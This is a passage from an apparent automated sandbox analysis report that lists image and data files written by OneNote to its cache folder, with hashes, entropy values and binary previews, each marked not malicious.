Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ...................&.............&.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............L<Vm".%...v.x.....N...^.................:!.x.K.....z........f........................................I.qk..B.....LZ..............L<Vm".%...v.x...........L<Vm".%...v.x.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000050.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.336155261241889
Encrypted:	false
SSDEEP:	96:is0Asp2KyCEmdNXPx9bURQyE8y20HsFhNbh:is0AsMKmmHX59bURJEe0HsFhNb
MD5:	84CBB0B3DBE4E9794436DD9C8AC1CFAC
SHA1:	52B6F86667C971F80A5BBDFF309E9896935AC755
SHA-256:	B93A4E86D4BB9C4C7ADDDB40C009991FE1ACDD474980B446602BB638F4F281C2
SHA-512:	B06A8AE705CDC7E3421621A0119A8E582AFF5468E19646218568078B2C18DBAFA6CC18EA9694404F8A342BA4B2BE4B26A197AFF3F12958B1A2C3D91BF7785099
Malicious:	false
Preview:	2...>.......V...v...J...................................................................................................................................2...>...2.......v...~............................I.......I.qk..B.....LZ...........N..L...)?.....N..L...)?.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................4..M..$..%..4....N...^................YhA...O.}g,.c..........f........................................I.qk..B.....LZ...............4..M..$..%..4...........4..M..$..%..4........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.466918767844075
Encrypted:	false
SSDEEP:	48:isBJ4x/Xsk//GOtUEesXS9KWsDoYrdQVruiMBXMhvgDeTDVk7hbETDALWI:isOdH1WEnXS9lsDlRQ56ygj
MD5:	138770A898FA003E42BB8470367EC863
SHA1:	A6BAD4BFDFDD86DF173AE03041ABFCF339C8810B
SHA-256:	5E3946E0B30DD26648C64240E6ADB784D67E80379A7DB784D46AE695E654AC2C
SHA-512:	747A72B9A23995CB9402F4EB2AA01304D459D432A802F1FB0B9C9C95C8FE0B2FB3A1CB8F2151C4F609487421B37D8AAFB702B3106069B3E2EFAD4A984CC9301B
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ...........n.....s.F%AP....n.....s.F%AP......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................=..3m_.........N...^................<<.C.A...mQPm........Z........................................I.qk..B.....LZ.................=..3m_..................=..3m_.............................................................................j.......T$c...............G.......H.......>............. .3...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000055.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.332372160679881
Encrypted:	false
SSDEEP:	48:tTGrsGwf2GhUuaWrt6n6MED5IXeUj96RkoVrdQqrPLeTBXUWUzGhqpuSFKL49:twstaWr0nnEmXeUj96y0RQyPsm1
MD5:	FE25045CCB022E14B13F78EC2C576840
SHA1:	FB5A48BE4F37575073B85D1DFF58294C553F1028
SHA-256:	67B1B4A35695CE9707F84F4EF21C45F0F60DC12C94E4B9FAF79451167A47ABA9
SHA-512:	6A571DD97CF875BFD559EF218C9494F4186091421FF35B8C898D5847DC450DD9DAEF7770224D178E8234077D7EC4ABAC933C2A1D7D27D29188B02290A6F8722A
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ............q....x3..n,.....q....x3..n,......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............8.R.....e.B.%......N...^...............K.yk..rG.w.5.r.x........f........................................I.qk..B.....LZ.............8.R.....e.B.%...........8.R.....e.B.%..........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000056.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000057.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.343167073739944
Encrypted:	false
SSDEEP:	48:Yu2s7lM6C6fDBGytmNB6EuVL7XE1IG/9WkoRrdQqrz0LGtBXqR62ku:YZsW6NBGyQ6EuVHXSF9WkYRQyR6k
MD5:	761562A571DEF4F2746F7FC2A65526EE
SHA1:	CB5172EC0CE73BFEFC6C88208271E5C1317D40FC
SHA-256:	E4F4580E36D0FD7E133F0B7D405626067D26F4FC1A7D5D57BF5E33DA3E4DCA57
SHA-512:	274075A5E959791E31D0D5EEDB6E24D5B1034D96E0673684298812FC74717637236F32A1FBECC5EFD76F4B45BAD290CEAD0BEF6A1B7EB37AB6100BAAD6D67929
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ._......._.~%...z2....._.~%...z2....._...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................Gpn..9..c.Y.[....N...^...............h.@9].J.z....;.........f........................................I.qk..B.....LZ...............Gpn..9..c.Y.[...........Gpn..9..c.Y.[.........._......._......._..........................................._.j....._.T.]..._......._..B..._.H....._...B..._...>.)._...J...................;........4...4...4.."..............._..._..._...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........._......._.....#._.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000058.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000059.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.318441018518079
Encrypted:	false
SSDEEP:	48:Yufp0spcweKIhpU8ttps5OEr7LCX6C+9m6oFrdQqrDwmpOBBXgU0lT2A0d0vDfF:YpspLKpUSLsOEr7eX619m60RQylOBYZ
MD5:	C1CC037ECAF0D7A4BE80D479855BDF69
SHA1:	0E0B51AF0C65EFC76103E7D45130ADC413F47EB3
SHA-256:	9EC9083492DBEB026C49640C9DC050BF21245BDD609643C7E6103F9D16EEF8E8
SHA-512:	0437EAA88176C1BE7C53108350046776708C3B0214937F95820304C056CA7520160F5772767C33B0E8F49A8DF2580AA9B829E2D61F249A8DCD8FE5D641C8DC8D
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZqs......qs.g....<....h.qs.g....<....h.qs...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............o.J.....7B...m^.....N...^...............^..Mm4N.....s.........f........................................I.qk..B.....LZ............o.J.....7B...m^.........o.J.....7B...m^..........qs......qs......qs..........................................qs.j....qs.T.]..qs......qs..B..qs.H....qs...B..qs...>.)qs...J...................;........4...4...4.."..............qs..qs..qs...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........qs......qs.....#qs.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.338918828438928
Encrypted:	false
SSDEEP:	96:Y9sN+B8QEPUXo9hg9IRQyF/RJpElUpbyi:GsN+BSPUXo9u9IRJVRJpElUpei
MD5:	4F66B6976EFB23A9F3ADAF63A2FBB44A
SHA1:	8328270A7F6EA11424DA6C612BA076854D2EBDDA
SHA-256:	4FE556954A17B47E7DEC312CEBE375BBE305D30F758A13AD1035C1279306ECA5
SHA-512:	6E4E93C42BFE0ECA976D7A6986D32418461A5BBEFD7A38EF3D38EC66F6C5F3DC4EEC9B2DEFCBDD816B7970EB44E26EF732B5983683CDD4BA0981D26F6F608560
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x.........................................2........?.I.......I.qk..B.....LZ......2........?.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............m.P.A....J.MA.H....N...^................_.....O...A............f........................................I.qk..B.....LZ............m.P.A....J.MA.H........m.P.A....J.MA.H........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.337809145062041
Encrypted:	false
SSDEEP:	48:LnEs1tPQY2ZrMGt3XqNE+YlLPlXsWGXR9SVDoBrdQqrzV+D2BXpY9Jmad:LnEskZrBdOEplJXsWGh9SB4RQyZDG
MD5:	DECF1B20D76AD33649B582FB04C6E9FA
SHA1:	1EC1145AE1739DBD45EABB3E3D37E2346151E463
SHA-256:	D0076DADE90454C2F81D61F3BD99BB65F4A563DF4752A6FB5E6D38B072C65D20
SHA-512:	19C67FE416C94E65F4F144EC0D67E5492E0C04F6739719EBA95932583DAA658B4CF14C7E53D161D2BB15AAC20F265560F540198AFB0B249B644B5E11268970B7
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZW,h.....W,hG....!._..K..W,hG....!._..K..W,h..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............G.q!.,....B.l......N...^................%...WYC....$.5.........f........................................I.qk..B.....LZ............G.q!.,....B.l..........G.q!.,....B.l...........W,h.....W,h.....W,h.........................................W,hj....W,hT.]..W,h.....W,h..B..W,hH....W,h..B..W,h..>.)W,h..J...................;........4...4...4.."..............W,h.W,h.W,h..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........W,h.....W,h....#W,h............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.613462014279845
Encrypted:	false
SSDEEP:	48:RXqesxAg8rxUptX9IE3/L3AXXXV9u0olrdQqrrDBX2YX9Nua/1:RXqesGxUpsE3/EXnV9u0cRQyXfSq
MD5:	B0A982F51D036E8D66DF437E50BB1EEC
SHA1:	3AD47FE09F12D038A50D2F6EA23656613293C233
SHA-256:	A83837E22B2B7ABBFC7D383342E4FF18D86C6B04F960D9C15C3D0FEBE3B01661
SHA-512:	B1E10DB906B94D6C4FF24A087DDFE9A396AAB7D48A7E79B946EABEF73B21232FCF79E2AA4648445F5B693EE53E4F9DF373DD5D9029287B390352D53F7C15D217
Malicious:	false
Preview:	2...>...........v...~...................................................................................................................................2...>...f.......v................................I.......I.qk..B.....LZ.P.......P.#."..;..9.....P.#."..;..9.....P...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............?q.....a.".......N...^.................T...6K...\V...........f...................................:....I.qk..B.....LZ..............?q.....a.".............?q.....a.".............P.......P.......P...........................................P.j.....P.T.]...P.......P...B...P.H.....P...B...P...>.).P...J...................;........4...4...4.."...............P...P...P...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........P.......P.....#.P.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
